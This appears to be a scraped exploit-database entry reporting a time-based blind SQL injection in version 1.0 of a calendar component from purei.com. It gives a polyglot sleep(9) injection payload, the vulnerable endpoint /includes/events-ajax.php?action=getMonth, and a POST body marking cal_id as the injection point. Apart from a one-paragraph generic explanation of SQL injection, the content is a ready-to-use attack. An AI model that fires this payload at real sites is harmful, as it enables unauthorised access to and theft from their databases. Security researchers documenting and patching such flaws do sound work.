Professional Documents
Culture Documents
51929
51929
51929
0 - SQL Injection
# Date: [27-03-2024]
# Exploit Author: [Number 7]
# Vendor Homepage: [purei.com]
# Version: [1.0]
# Tested on: [Linux]
___________________________________________________________________________________
_
Introduction:
An SQL injection vulnerability permits attackers to modify backend SQL statements
through manipulation
of user input. Such an injection transpires when web applications accept user input
directly inserted
into an SQL statement without effectively filtering out hazardous characters.
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now(
)=sysdate(),sleep(9),0))OR"*/
Vunerable file:
/includes/events-ajax.php?action=getMonth
data for the POST req:
month=3&type=&year=2024&cal_id=1[Inject Here]